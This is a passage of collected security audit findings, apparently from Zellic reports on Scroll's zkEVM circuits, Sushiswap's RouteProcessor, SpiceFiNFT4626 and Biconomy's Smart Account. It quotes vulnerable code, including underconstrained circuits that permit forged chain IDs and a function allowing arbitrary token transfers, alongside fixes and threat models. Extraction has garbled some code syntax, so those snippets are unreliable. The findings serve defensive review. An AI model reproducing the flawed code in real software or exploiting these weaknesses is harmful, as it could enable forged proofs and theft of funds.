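For illustration, a hedged sketch of the recommended split (the trait names are ours): pub trait ByteRlcLookup { fn lookup(&self) -> [Query; 3]; } pub trait CanonicalRlcLookup { fn lookup(&self) -> [Query; 3]; } with ByteRepresentationConfig implementing only ByteRlcLookup and CanonicalRepresentationConfig implementing only CanonicalRlcLookup, so call sites such as word_rlc.rs must name the lookup semantics they rely on and a mismatched table is rejected at compile time.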
Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" + }, + { + "title": "1.21 Missing constraints for new account in configure_balance", + "labels": [ + "Zellic" + ], + "body": "Target: MPT Circuit, gadgets/mpt_update.rs Category: Underconstrained Cir- Severity: High : High cuits Likelihood: Medium Descripton Within configure_balance in the MPT circuit, with segment type AccountLeaf3 and path type ExtensionNew, there should be a constraint that ensures that the sibling is equal to 0. This corresponds to the case when we are creating a new entry in the accounts trie and we are assigning the balance of the account as the first entry. Without this constraint, there may be soundness issues when updating the balance of a new address. We recommend adding a check to constraint the sibling (i.e., nonce/codesize) to be equal to 0. This issue has been acknowledged by Scroll, and a fix was implemented in commit ef64eb52. Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" + }, + { + "title": "1.22 Missing constraints in configure_empty_storage", + "labels": [ + "Zellic" + ], + "body": "Target: MPT Circuit, gadgets/mpt_update.rs Category: Underconstrained Cir- Severity: Critical : Critical cuits Likelihood: Medium Descripton There should be a check to ensure that the old_hash and new_hash are the same for an empty storage entry. This is similar to the case in configure_empty_account where the same thing is in fact constrained: fn configure_empty_account(/) ...)) *)) { /) ...)) cb.assert_equal( \u201dhash doesn't change for empty account\u201d, config.old_hash.current(), config.new_hash.current(), ); /) ...)) } This may lead to soundness issues when proving that storage does not exist. We recommend adding a check to constrain the equality of the old and the new hash. This issue has been acknowledged by Scroll, and a fix was implemented in commit 3ab166a4. Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" + }, + { + "title": "1.23 Enforcing padding rows in MPT circuit", + "labels": [ + "Zellic" + ], + "body": "Target: MPT Circuit, gadgets/mpt_update.rs Category: Underconstrained Cir- Severity: Medium : Medium cuits Likelihood: Low Descripton The configure_empty_storage and configure_empty_account use the following check to determine if the current row is the final segment. let is_final_segment = config.segment_type.next_matches(&[SegmentType:)Start]); In the case that the current proof is the last proof in the MPT table, this assumes that the rows after the last proof are populated with the appropriate padding rows. However, there are no constraints to ensure that these padding rows have been as- signed properly at the end of the MPT circuit. Without this constraint, there may be soundness issues for MPTProofType:)StorageDo esNotExist and MPTProofType:)AccountDoesNotExist. We recommend adding checks in the circuit to ensure that the padding rows have been assigned following the algorithm in assign_padding_row. This issue has been acknowledged by Scroll, and a fix was implemented in commit ac3f8d89. 
Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" + }, + { + "title": "1.24 Incorrect constraints in configure_nonce", + "labels": [ + "Zellic" + ], + "body": "Target: MPT Circuit, gadgets/mpt_update.rs Category: Underconstrained Cir- Severity: High : High cuits Likelihood: Medium Descripton In configure_nonce, when the segment type is AccountLeaf3 and the path type is Comm on, there is a missed check on the size of the new nonce. This is because the old value of the nonce is mistakenly checked (see [1]). Additionally, there is another incorrect check when the path type is ExtensionNew where the old nonce is range checked instead of the new nonce (see [2]). fn configure_nonce(/) ...)) *)) { /) ...)) SegmentType:)AccountLeaf3 => { /) ...)) cb.condition( config.path_type.current_matches(&[PathType:)Common]), |cb| { cb.add_lookup( \u201dnew nonce is 8 bytes\u201d, [config.old_value.current(), Query:)from(7)], /) [1] Typo. bytes.lookup(), ); /) ...)) } ); cb.condition( config.path_type.current_matches(&[PathType:)ExtensionNew]), |cb| { cb.add_lookup( \u201dnew nonce is 8 bytes\u201d, [config.old_value.current(), Query:)from(7)], /) [2] Typo bytes.lookup(), ); Scroll /) ...)) }, ); } /) ...)) } As the nonce values are not range checked properly, proofs about accounts with in- valid nonces can be generated. This could potentially lead to denial-of-service attacks on addresses. Fix the typos to range check the correct nonce values. This issue has been acknowledged by Scroll, and a fix was implemented in commit 9aeff02e. Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" + }, + { + "title": "1.25 Conflicting constraints in configure_code_size", + "labels": [ + "Zellic" + ], + "body": "Target: MPT Circuit, gadgets/mpt_update.rs Category: Coding Mistakes Likelihood: Low Severity: Low : Low Descripton In configure_code_size, the first line ensures that the only possible path types that can be proved are PathType:)Start and PathType:)Common. fn configure_code_size( cb: &mut ConstraintBuilder, config: &MptUpdateConfig, bytes: &impl BytesLookup, ) { cb.assert( \u201dnew accounts have balance or nonce set first\u201d, config .path_type .current_matches(&[PathType:)Start, PathType:)Common]), ); /) ...)) } However, later on in the function, there are constraints that are conditioned on the current path type being either PathType:)ExtensionOld or PathType:)ExtensionNew. These two above-mentioned constraints are contradictory, and the code later on will never be executed as these conditions cannot be true. A similar issue also exists in configure_poseidon_code_hash. If this is intended behavior, then the above-mentioned constraints are dead code and add to unnecessary code complexity. We recommend removing those constraints if they are not necessary. Scroll This issue has been acknowledged by Scroll, and a fix was implemented in commit 004fcddb. Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" + }, + { + "title": "1.26 ByteRepresentation:)index is not properly constrained", + "labels": [ + "Zellic" + ], + "body": "Target: MPT Circuit, gadgets/byte_representation.rs Category: Underconstrained Cir- Severity: Medium : Medium cuits Likelihood: Low Descripton In the ByteRepresentation gadget, there is a constraint which ensures that the index always increases by 1 or is 0. 
The expected behavior is that it constrains the value of index to be 0 at the first row. impl ByteRepresentationConfig { pub fn configure(/* ... */) -> Self { let [value, index, byte] = cb.advice_columns(cs); let [rlc] = cb.second_phase_advice_columns(cs); let index_is_zero = IsZeroGadget::configure(cs, cb, index); cb.assert_zero( \"index increases by 1 or resets to 0\", index.current() * (index.current() - index.previous() - 1), ); At the first row, a rotation to the previous row will wrap around to the last row of the table, which includes the blinding factors in Halo2. This lets the value of the index be controlled by values in the last row of the table. Instead of the index being set to 0 in the first row, a prover can assign an arbitrary nonzero value depending on the contents of the last row of the table. We recommend adding a selector which enables a constraint to constrain that index = 0 at the first row. This issue has been acknowledged by Scroll, and a fix was implemented in commit c8f9c7f3.", "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" }, { "title": "1.27 Miscellaneous typos in comments and constraint descriptions", "labels": [ "Zellic" ], "body": "Target: MPT Circuit Category: Code Maturity Likelihood: N/A Severity: Informational Impact: Informational Description In byte_representation.rs, the following constraints have incorrect comments. They should have (index != 0). cb.assert_equal( \"current value = previous value * 256 * (index == 0) + byte\", value.current(), value.previous() * 256 * !index_is_zero.current() + byte.current(), ); cb.assert_equal( \"current rlc = previous rlc * randomness * (index == 0) + byte\", rlc.current(), rlc.previous() * randomness.query() * !index_is_zero.current() + byte.current(), ); In mpt_update.rs, the function configure_code_size has the following constraint. The description is incorrect, as it actually checks that the balance is 0. cb.assert_zero( \"nonce and code size are 0 for ExtensionNew balance update\", config.sibling.current(), ); In mpt_update.rs, the following constraint has an incorrect description. The constraint checks new_value, but the comment mentions old_value. cb.condition(!is_start, |cb| { // ... cb.assert_equal( // typo \"old_value does not change\",
This issue has been acknowledged by Scroll, and fixes were implemented in the fol- lowing commits: f89e2d58 f9ff6bb5 Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" + }, + { + "title": "1.28 ChainId is not mapped to it\u2019s corresponding RLP Tag in Tx Circuit", + "labels": [ + "Zellic" + ], + "body": "Target: Tx Circuit, tx_circuit.rs Category: Underconstrained Cir- cuits Likelihood: Medium Severity: High : High Descripton In the Tx Circuit, the TxFieldTag values in the tag_bits column are mapped to their respective RLP Tag values using the following map: let rlp_tag_map: Vec<(Expression, RlpTag)> = vec![ (is_nonce(meta), Tag:)Nonce.into()), (is_gas_price(meta), Tag:)GasPrice.into()), /) ...)) (is_caller_addr(meta), Tag:)Sender.into()), (is_tx_gas_cost(meta), GasCost), /) tx tags which correspond to Null (is_null(meta), Null), (is_create(meta), Null), /) ...)) (is_block_num(meta), Null), (is_chain_id_expr(meta), Null), ]; In this map, the values which do not have a corresponding RLP Tag are set to Null. Here, chain_id is incorrectly set to Null even though it is part of the RLP encoded transaction (Tag:)ChainId). The rlp_tag values are used to lookup into the RLP table to ensure that the appropriate values are being hashed for verifying the transaction signature. meta.create_gate(\u201dsign tag lookup into RLP table condition\u201d, |meta| { let mut cb = BaseConstraintBuilder:)default(); let is_tag_in_tx_sign = sum:)expr([ is_nonce(meta), Scroll is_gas_price(meta), is_gas(meta), is_to(meta), is_value(meta), is_data_rlc(meta), is_sign_length(meta), is_sign_rlc(meta), ]); cb.require_equal( \u201dcondition\u201d, is_tag_in_tx_sign, meta.query_advice( lookup_conditions[&LookupCondition:)RlpSignTag], Rotation:)cur(), ), ); As the Chain ID is missing from these lookup checks, one can forge the Chain ID value for a given transaction with a existing signature. We recommend adding the mapping from TxFieldTag:)ChainID to the RLP Tag Tag:)C hainId. We also recommend ensuring that the Chain ID value in the Tx Table is looked up into the RLP Table using the above mapping. This issue has been acknowledged by Scroll, and a fix was implemented in commit 2e422878. Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" + }, + { + "title": "1.29 Highest tx_id must be equal to cum_num_txs in Tx Circuit", + "labels": [ + "Zellic" + ], + "body": "Target: Tx Circuit, tx_circuit.rs Category: Underconstrained Cir- cuits Likelihood: Medium Severity: High : High Descripton In the Tx Circuit, there is a check to ensure that tx_id is less than the cum_num_txs value which is looked up from the block table. meta.create_gate(\u201dtx_id <) cum_num_txs\u201d, |meta| { let mut cb = BaseConstraintBuilder:)default(); let (lt_expr, eq_expr) = tx_id_cmp_cum_num_txs.expr(meta, None); cb.condition(is_block_num(meta), |cb| { cb.require_equal(\u201dlt or eq\u201d, sum:)expr([lt_expr, eq_expr]), true.expr()); }); cb.gate(and:)expr([ meta.query_fixed(q_enable, Rotation:)cur()), not:)expr(meta.query_advice(is_padding_tx, Rotation:)cur())), ])) }); In a valid block, the largest value of tx_id also must be equal to the value of cum_num_ txs. Currently, there is no constraint which ensures this. The cum_num_txs value can be set to be much larger than the actual set of tx_ids. 
We recommend adding a constraint to check that the tx_id of the last non-padding transaction in the Tx Circuit is equal to the cum_num_txs. Scroll This issue has been acknowledged by Scroll, and a fix was implemented in commit 2e422878. Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" + }, + { + "title": "3.1 The transferred amount may not reflect msg.value", + "labels": [ + "Zellic" + ], + "body": "Target: RouteProcessor Category: Business Logic Likelihood: Medium Severity: Medium : Medium The wrapAndDistributeERC20Amounts function wraps the native tokens that were sup- plied by the user and then forwards them to the pools that RouteProcessor interacts with. Here, the msg.value parameter is not checked against the amountTotal variable, leaving room for error. function wrapAndDistributeERC20Amounts(uint256 stream, address token) private returns (uint256 amountTotal) { wNATIVE.deposit{value: msg.value}(); uint8 num = stream.readUint8(); amountTotal = 0; for (uint256 i = 0; i < num; +)i) { address to = stream.readAddress(); uint256 amount = stream.readUint(); amountTotal += amount; IERC20(token).safeTransfer(to, amount); } } This could lead to loss of funds for the end user in the case that they transfer more than the required amount. Zellic Sushiswap We recommend adding a check to ensure that msg.value =) amountTotal at the end of the function, as shown below: function wrapAndDistributeERC20Amounts(uint256 stream, address token) private returns (uint256 amountTotal) { wNATIVE.deposit{value: msg.value}(); uint8 num = stream.readUint8(); amountTotal = 0; for (uint256 i = 0; i < num; +)i) { address to = stream.readAddress(); uint256 amount = stream.readUint(); amountTotal += amount; IERC20(token).safeTransfer(to, amount); } require(msg.value =) amountTotal, \u201cRouteProcessor: invalid amount\u201d); } This issue was fixed by Sushiswap in commit 4aa4bd3. Zellic Sushiswap", + "html_url": "https://github.com/Zellic/publications/blob/master/Sushiswap Route Processor - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Arbitrary token transfers in wrapAndDistributeERC20Amounts", + "labels": [ + "Zellic" + ], + "body": "Target: RouteProcessor Category: Coding Mistakes Likelihood: Low Severity: Low : Low The wrapAndDistributeERC20Amounts function wraps and then forwards the wrapped tokens from the RouteProcessor contract to the pools that it interacts with. function wrapAndDistributeERC20Amounts(uint256 stream, address token) private returns (uint256 amountTotal) { wNATIVE.deposit{value: msg.value}(); uint8 num = stream.readUint8(); amountTotal = 0; for (uint256 i = 0; i < num; +)i) { address to = stream.readAddress(); uint256 amount = stream.readUint(); amountTotal += amount; /) @audit arbitrary `token` is passed, instead of `wNATIVE` IERC20(token).safeTransfer(to, amount); } } Due to the way the token parameter is passed to the safeTransfer function, it is pos- sible to pass an arbitrary token address to the function. This allows for anyone to send tokens on behalf of the contract. This is not a highly critical issue, as the RouteProcessor contract should, in theory, be interacted with via the Sushiswap front end, which would generate a legitimate token address in its route generation process. Moreover, it is not expected of the contract to hold any tokens, as it is designed to be used as a one-time transaction. Zellic Sushiswap The transaction is reverted, and the tokens are not sent. 
In some cases, it could lead to tokens up for grabs in the MEV (e.g., via front-running), should any user unknowingly transfer tokens to the RouteProcessor contract. We recommend removing the token parameter altogether. function wrapAndDistributeERC20Amounts(uint256 stream) private returns (uint256 amountTotal) { wNATIVE.deposit{value: msg.value}(); uint8 num = stream.readUint8(); amountTotal = 0; for (uint256 i = 0; i < num; +)i) { address to = stream.readAddress(); uint256 amount = stream.readUint(); amountTotal += amount; IERC20(wNATIVE).safeTransfer(to, amount); } require(msg.value =) amountTotal, \u201cRouteProcessor: invalid amount\u201d); } This issue was fixed by Sushiswap in commit 4aa4bd3. Zellic Sushiswap", + "html_url": "https://github.com/Zellic/publications/blob/master/Sushiswap Route Processor - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Missing access control revocation", + "labels": [ + "Zellic" + ], + "body": "Target: SpiceFiNFT4626 Category: Coding Mistakes Likelihood: High Severity: Medium : Medium The initialize function assigns the DEFAULT_ADMIN_ROLE to the multisig_ account passed as a parameter to the function. The address is also stored in the aptly named multisig member variable. The setMultisig function can be used by authorized callers to update the multisi g variable; however, the function does not revoke the role assigned to the former multisig address, nor does it grant the role to the new address. Rotated multisig addresses might retain unintended roles, and new multisig addresses may not be assigned the correct role. Ensure the proper roles are assigned and revoked by setMultisig. The issue is fixed as of commit 51fdc6e1; the DEFAULT_ADMIN_ROLE is revoked from the previous multisig account. Zellic Spice Finance Inc. 4 Threat Model This provides a full threat model description for various functions. As time permitted, we analyzed each function in the smart contracts and created a written threat model for some critical functions. A threat model documents a given function\u2019s externally controllable inputs and how an attacker could leverage each input to cause harm. Not all functions in the audit scope may have been modeled. The absence of a threat model in this section does not necessarily suggest that a function is safe. 4.1 File: SpiceFiNFT4626 Function: previewDeposit (same as OZ ERC4626) Function: previewMint (same as OZ ERC4626) Function: previewWithdraw (same as OZ ERC4626) Function: previewRedeem (same as OZ ERC4626) Function: deposit (same as OZ ERC4626) Function: mint Intended behavior Accept the user asset and mint the shares to a tokenId of their choosing or mint a new NFT. Preconditions If the tokenId is an existing NFT, the caller has to be the owner of the NFT. Inputs tokenId \u2013 Control: Full control \u2013 Authorization: None \u2013 : The NFT token Id assets \u2013 Control: Full control Zellic Spice Finance Inc. 
\u2013 Authorization: None \u2013 : Amount of shares to receive Function call analysis previewMint \u2013 What is controllable?: Everything \u2013 What happens if it reverts, reenters, or does other unusual control flow?: Nothing \u2013 If return value is controllable, how is it used and how can it go wrong: The amount of asset to take weth.transferFrom \u2013 What is controllable?: Amount \u2013 What happens if it reverts, reenters, or does other unusual control flow?: Nothing \u2013 If return value is controllable, how is it used and how can it go wrong: Discarded _deposit \u2013 What is controllable?: tokenId, assets \u2013 What happens if it reverts, reenters, or does other unusual control flow?: Nothing \u2013 If return value is controllable, how is it used and how can it go wrong: Discarded Function: redeem Intended behavior Redeem shares from a given tokenId NFT. Preconditions Must not be a revealed NFT, must be withdrawable, and caller has to own the NFT. Inputs tokenId \u2013 Control: Full control Zellic Spice Finance Inc. \u2013 Authorization: None \u2013 : The NFT token Id shares \u2013 Control: Full Control \u2013 Authorization: None \u2013 : Amount of shares to redeem receiver \u2013 Control: Full Control \u2013 Authorization: None \u2013 : The person who receives the asset Function call analysis previewRedeem \u2013 What is controllable?: Everything \u2013 What happens if it reverts, reenters, or does other unusual control flow?: Nothing \u2013 If return value is controllable, how is it used and how can it go wrong: The amount of asset to take _convertToAssets \u2013 What is controllable?: Shares \u2013 What happens if it reverts, reenters, or does other unusual control flow?: Nothing \u2013 If return value is controllable, how is it used and how can it go wrong: Calculate assets with fees _withdraw \u2013 What is controllable?: tokenId, shares, receiver \u2013 What happens if it reverts, reenters, or does other unusual control flow?: Nothing \u2013 If return value is controllable, how is it used and how can it go wrong: Discarded Function: withdraw Intended behavior Withdraw asset from a given tokenId NFT. Zellic Spice Finance Inc. Preconditions mMst not be a revealed NFT, must be withdrawable, and caller has to own the NFT. Inputs tokenId \u2013 Control: Full control \u2013 Authorization: None \u2013 : The NFT token Id asset \u2013 Control: Full Control \u2013 Authorization: None \u2013 : Amount of asset to withdraw receiver \u2013 Control: Full control \u2013 Authorization: None \u2013 : The person who receives the asset Function call analysis previewWithdraw \u2013 What is controllable?: Everything \u2013 What happens if it reverts, reenters, or does other unusual control flow?: Nothing \u2013 If return value is controllable, how is it used and how can it go wrong: The amount of asset to take _convertToAssets \u2013 What is controllable?: Shares \u2013 What happens if it reverts, reenters, or does other unusual control flow?: Nothing \u2013 If return value is controllable, how is it used and how can it go wrong: Calculate assets with fees _convertToShares \u2013 What is controllable?: Assets \u2013 What happens if it reverts, reenters, or does other unusual control flow?: Nothing \u2013 If return value is controllable, how is it used and how can it go wrong: Zellic Spice Finance Inc. 
Calculate assets with fees _withdraw \u2013 What is controllable?: tokenId, asset, receiver \u2013 What happens if it reverts, reenters, or does other unusual control flow?: Nothing \u2013 If return value is controllable, how is it used and how can it go wrong: Discarded Function: deposit Intended behavior Accept the user asset and mint the shares to a tokenId of their choosing or mint a new NFT. Preconditions If the tokenId is an existing NFT, the caller has to be the owner of the NFT. Inputs tokenId \u2013 Control: Full control \u2013 Authorization: None \u2013 : The NFT token Id assets \u2013 Control: Full control \u2013 Authorization: None \u2013 : Amount of asset to invest Function call analysis previewDeposit \u2013 What is controllable?: Everything \u2013 What happens if it reverts, reenters, or does other unusual control flow?: Nothing \u2013 If return value is controllable, how is it used and how can it go wrong: The amount of shares to mint Zellic Spice Finance Inc. weth.transferFrom \u2013 What is controllable?: amount \u2013 What happens if it reverts, reenters, or does other unusual control flow?: Nothing \u2013 If return value is controllable, how is it used and how can it go wrong: Discarded _deposit \u2013 What is controllable?: tokenId, assets \u2013 What happens if it reverts, reenters, or does other unusual control flow?: Nothing \u2013 If return value is controllable, how is it used and how can it go wrong: Discarded Function: deposit (strategist) Intended behavior Invest the assets of this vault into another vault. Preconditions msg.sender has to be a strategist. Inputs vault \u2013 Control: Full control \u2013 Authorization: Checks if the vault is approved, through VAULT_ROLE \u2013 : Vault to invest in assets \u2013 Control: Full control \u2013 Authorization: None \u2013 : Amount of asset to invest minShares \u2013 Control: Full control \u2013 Authorization: None \u2013 : Slippage check Zellic Spice Finance Inc. Function call analysis _checkRole \u2013 What is controllable?: Control the address, but nothing else \u2013 What happens if it reverts, reenters, or does other unusual control flow?: Means that the address was not approved \u2013 If return value is controllable, how is it used and how can it go wrong: Discarded asset.safeIncreaseAllowance \u2013 What is controllable?: vault, amount \u2013 What happens if it reverts, reenters, or does other unusual control flow?: Nothing \u2013 If return value is controllable, how is it used and how can it go wrong: Discarded vault.deposit \u2013 What is controllable?: assets and receiver \u2013 What happens if it reverts, reenters, or does other unusual control flow?: Reverts if the vault doesn\u2019t have enough asset \u2013 If return value is controllable, how is it used and how can it go wrong: Discarded Function: mint (strategist) Intended behavior invest the assets of this vault into another vault. Preconditions msg.sender has to be a strategist. Inputs vault \u2013 Control: Full control \u2013 Authorization: Checks if the vault is approved, through VAULT_ROLE \u2013 : Vault to invest in shares \u2013 Control: Full control Zellic Spice Finance Inc. 
\u2013 Authorization: None \u2013 : Amount of asset to invest maxAsset \u2013 Control: Full control \u2013 Authorization: None \u2013 : Slippage check Function call analysis _checkRole \u2013 What is controllable?: Control the address, but nothing else \u2013 What happens if it reverts, reenters, or does other unusual control flow?: Means that the address was not approved \u2013 If return value is controllable, how is it used and how can it go wrong: Discarded asset.safeIncreaseAllowance \u2013 What is controllable?: vault, amount \u2013 What happens if it reverts, reenters, or does other unusual control flow?: Nothing \u2013 If return value is controllable, how is it used and how can it go wrong: Discarded vault.mint \u2013 What is controllable?: shares and receiver \u2013 What happens if it reverts, reenters, or does other unusual control flow?: Reverts if the vault doesn\u2019t have enough asset \u2013 If return value is controllable, how is it used and how can it go wrong: Discarded Function: withdraw (strategist) Intended behavior Withdraw capital from invested vault. Preconditions msg.sender has to be a strategist. Zellic Spice Finance Inc. Inputs vault \u2013 Control: Full control \u2013 Authorization: Checks if the vault is approved, through VAULT_ROLE \u2013 : Vault to invest in assets \u2013 Control: Full control \u2013 Authorization: None \u2013 : Amount of asset to invest maxAsset \u2013 Control: Full control \u2013 Authorization: None \u2013 : Slippage check Function call analysis _checkRole \u2013 What is controllable?: Control the address, but nothing else \u2013 What happens if it reverts, reenters, or does other unusual control flow?: Means that the address was not approved \u2013 If return value is controllable, how is it used and how can it go wrong: Discarded vault.withdraw \u2013 What is controllable?: assets, receiver, owner \u2013 What happens if it reverts, reenters, or does other unusual control flow?: Ok \u2013 If return value is controllable, how is it used and how can it go wrong: Discarded Function: redeem (strategist) Intended behavior Redeem capital from invested vault. Preconditions msg.sender has to be a strategist. Zellic Spice Finance Inc. Inputs vault \u2013 Control: Full control \u2013 Authorization: Checks if the vault is approved, through VAULT_ROLE \u2013 : Vault to invest in assets \u2013 Control: Full control \u2013 Authorization: None \u2013 : Amount of asset to invest minAssets \u2013 Control: Full control \u2013 Authorization: None \u2013 : Slippage check Function call analysis _checkRole \u2013 What is controllable?: Control the address, but nothing else \u2013 What happens if it reverts, reenters, or does other unusual control flow?: Means that the address was not approved \u2013 If return value is controllable, how is it used and how can it go wrong: Discarded vault.redeem \u2013 What is controllable?: assets, receiver, owner \u2013 What happens if it reverts, reenters, or does other unusual control flow?: Ok \u2013 If return value is controllable, how is it used and how can it go wrong: Discarded Zellic Spice Finance Inc. 5 Audit Results At the time of our audit, the code was not deployed to mainnet Ethereum. During our assessment on the scoped SpiceFiNFT4626 contracts, we discovered one issue of medium impact. Spice Finance Inc. 
", + "html_url": "https://github.com/Zellic/publications/blob/master/SpiceFiNFT4626 - Zellic Audit Report.pdf" + }, + { + "title": "4.1 Module: ModuleManager.sol Function: execTransactionFromModule(address to, uint256 value, byte[] data, Enum.Operation operation, uint256 txGas) Available only for enabled modules. Allows a trusted module to execute transactions directly. Branches and code coverage (including function calls) Negative behavior", + "labels": [ + "Zellic" + ], + "body": "The caller is not a trusted module. \u25a1 Negative test The caller is the disabled module. \u25a1 Negative test Function call analysis execute(to, value, data, operation, txGas == 0 ? gasleft() : txGas); -> delegatecall(txGas, to, add(data, 0x20), mload(data), 0, 0) \u2013 External/Internal? External. \u2013 Argument control? txGas, to, and data. \u2013 : Perform delegatecall of to address. execute(to, value, data, operation, txGas == 0 ? gasleft() : txGas); -> call(txGas, to, value, add(data, 0x20), mload(data), 0, 0) \u2013 External/Internal? External. \u2013 Argument control? txGas, to, data, and value. \u2013 : Perform call of to address. Function: execTransactionFromModule(address to, uint256 value, byte[] data, Enum.Operation operation) The same as execTransactionFromModule(address to, uint256 value, bytes memory data, Enum.Operation operation, uint256 txGas), but with txGas set to zero.", + "html_url": "https://github.com/Zellic/publications/blob/master/Biconomy Smart Account - Zellic Audit Report.pdf" + }, + { + "title": "4.2 Module: SmartAccountFactory.sol Function: deployCounterFactualAccount(address moduleSetupContract, byte[] moduleSetupData, uint256 index) Allows any user to deploy smart account contracts. Inputs", + "labels": [ + "Zellic" + ], + "body": "moduleSetupContract \u2013 Control: Full control. \u2013 Constraints: No restrictions. \u2013 : The address of the module that will be enabled and set up during the init() function call. moduleSetupData \u2013 Control: Full control. \u2013 Constraints: No. \u2013 : Contains the function signature and data for the module call. index \u2013 Control: Full control. \u2013 Constraints: If the contract with the index was already deployed, the transaction will be reverted. \u2013 : Extra salt. Branches and code coverage (including function calls) Intended branches New smart account contract was initialized properly. \u25a1 Test coverage Negative behavior Revert if index was already used by the same EOA. \u25a1 Negative test Function call analysis proxy.init(address(minimalHandler), moduleSetupContract, moduleSetupData) \u2013 External/Internal? External. \u2013 Argument control? moduleSetupContract and moduleSetupData. \u2013 : Initialize new smart account contract with required state. moduleSetupContract.call(..., moduleSetupData, ...) \u2013 External/Internal? External. \u2013 Argument control? moduleSetupContract and moduleSetupData. \u2013 : Call moduleSetupContract over the low-level call for the initialization of the module, for example, the installation of the owner address of this smart account.", + "html_url": "https://github.com/Zellic/publications/blob/master/Biconomy Smart Account - Zellic Audit Report.pdf" + }, + { + "title": "4.3 Module: SmartAccount.sol Function: addDeposit() Available for anyone. Transfers native tokens provided by the caller to the EntryPoint contract.
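The enabled-modules gating that recurs through these SmartAccount functions (see execTransactionFromModule in 4.1 above) can be modeled roughly as follows; this is a Python sketch with hypothetical names, not the audited Solidity implementation. The only authorization applied before the arbitrary call dispatch is membership in the enabled-modules set.

# Rough Python model (hypothetical names) of the module gating in 4.1:
# only enabled modules may reach the arbitrary call dispatch.

class NotAuthorizedModule(Exception):
    pass

class ModuleManagerModel:
    def __init__(self):
        self.enabled_modules: set[str] = set()

    def enable_module(self, module: str) -> None:
        self.enabled_modules.add(module)

    def exec_transaction_from_module(self, caller: str, to: str, value: int, data: bytes) -> None:
        # Sole authorization check: caller must be an enabled (trusted) module.
        if caller not in self.enabled_modules:
            raise NotAuthorizedModule(caller)
        # A trusted module then fully controls target, value, and calldata.
        self._execute(to, value, data)

    def _execute(self, to: str, value: int, data: bytes) -> None:
        print(f'call {to} value={value} data={data.hex()}')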
Function: disableModule(address prevModule, address module) Function available only for EntryPoint or self-call. Allows disabling a module address so that it can no longer be used for validation. Function: enableModule(address module) Function available only for EntryPoint or self-call. Allows caller to enable the new address of the module. Inputs", + "labels": [ + "Zellic" + ], + "body": "module \u2013 Control: Full control. \u2013 Constraints: No. \u2013 : The address of the module used to verify user operation. Branches and code coverage (including function calls) Intended branches New module was enabled. \u25a1 Test coverage Negative behavior The caller is not entry point or this contract. \u25a1 Negative test Function call analysis _enableModule(module) \u2013 External/Internal? Internal. \u2013 Argument control? module. \u2013 : Add module address to the enabled modules. Function: executeCall(address dest, uint256 value, byte[] func) Function just calls executeCall_s1m, which is available only for EntryPoint. See the executeCall_s1m description. Function: executeCall_s1m(address dest, uint256 value, byte[] func) Function available only for EntryPoint. Allows EntryPoint to perform the transaction. Inputs dest \u2013 Control: Full control. \u2013 Constraints: No. \u2013 : The arbitrary contract that will be called. value \u2013 Control: Full control. \u2013 Constraints: No. \u2013 : Amount of native tokens that will be transferred. func \u2013 Control: Full control. \u2013 Constraints: No. \u2013 : The transaction data. Contains the function that will be called. Branches and code coverage (including function calls) Negative behavior msg.sender is not EntryPoint or this contract. \u25a1 Negative test Function call analysis _call(dest, value, func) -> call(..., target, value, add(data, 0x20), mload(data), ...) \u2013 External/Internal? External. \u2013 Argument control? target, value, and data. \u2013 : Arbitrary external call. Function: init(address handler, address moduleSetupContract, byte[] moduleSetupData) The function is called only once during deployment from the proxy contract. Allows setting up and enabling the module provided by a call to deployCounterFactualAccount or deployAccount of the SmartAccountFactory contract. Inputs handler \u2013 Control: Full control. \u2013 Constraints: Cannot be zero address. \u2013 : The address of the contract handling the fallback calls. moduleSetupContract \u2013 Control: Full control. \u2013 Constraints: No. \u2013 : The address of module. moduleSetupData \u2013 Control: Full control. \u2013 Constraints: No. \u2013 : The calldata for moduleSetupContract. Branches and code coverage (including function calls) Negative behavior Cannot be called twice. \u25a1 Negative test Function call analysis _initialSetupModules -> call(..., moduleSetupContract, ..., moduleSetupData) \u2013 External/Internal? External. \u2013 Argument control? moduleSetupContract, moduleSetupData \u2013 : Calling the arbitrary moduleSetupContract contract, which should be trusted by the caller. Function: setupAndEnableModule(address setupContract, byte[] setupData) Function available only for EntryPoint or self-call. Allows caller to enable the new address of the module and call it for configuration when this is the first enabling. Inputs setupContract \u2013 Control: Full control. \u2013 Constraints: No. \u2013 : The address of the module used to verify user operation.
setupData \u2013 Control: Full control. \u2013 Constraints: No. \u2013 : Data used to configure the module. Branches and code coverage (including function calls) Intended branches New module was enabled. \u25a1 Test coverage Negative behavior The caller is not entry point or this contract. \u25a1 Negative test Function call analysis _setupAndEnableModule(setupContract, setupData) -> call(..., setupContract, ..., add(setupData, 0x20), mload(setupData), ...) \u2013 External/Internal? External. \u2013 Argument control? setupContract and setupData. \u2013 : Calls setupContract to configure it before use. Function: updateImplementation(address _implementation) Function available only for EntryPoint or self-call. Allows updating the address of the implementation used by the proxy contract. Inputs _implementation \u2013 Control: Full control. \u2013 Constraints: _implementation != address(0). \u2013 : The address of the contract that will be used as the smart account implementation over delegatecall by the proxy contract. Branches and code coverage (including function calls) Intended branches The implementation was updated properly. \u25a1 Test coverage Negative behavior _implementation == address(0). \u25a1 Negative test Caller is neither the entry point nor a self-call. \u25a1 Negative test _implementation is an EOA. \u25a1 Negative test Function: validateUserOp(UserOperation userOp, byte[32] userOpHash, uint256 missingAccountFunds) Function available only for EntryPoint. The function is called from the EntryPoint.handleOps function, which can be called by any caller with valid user operation data. The function reverts if the module is untrusted; 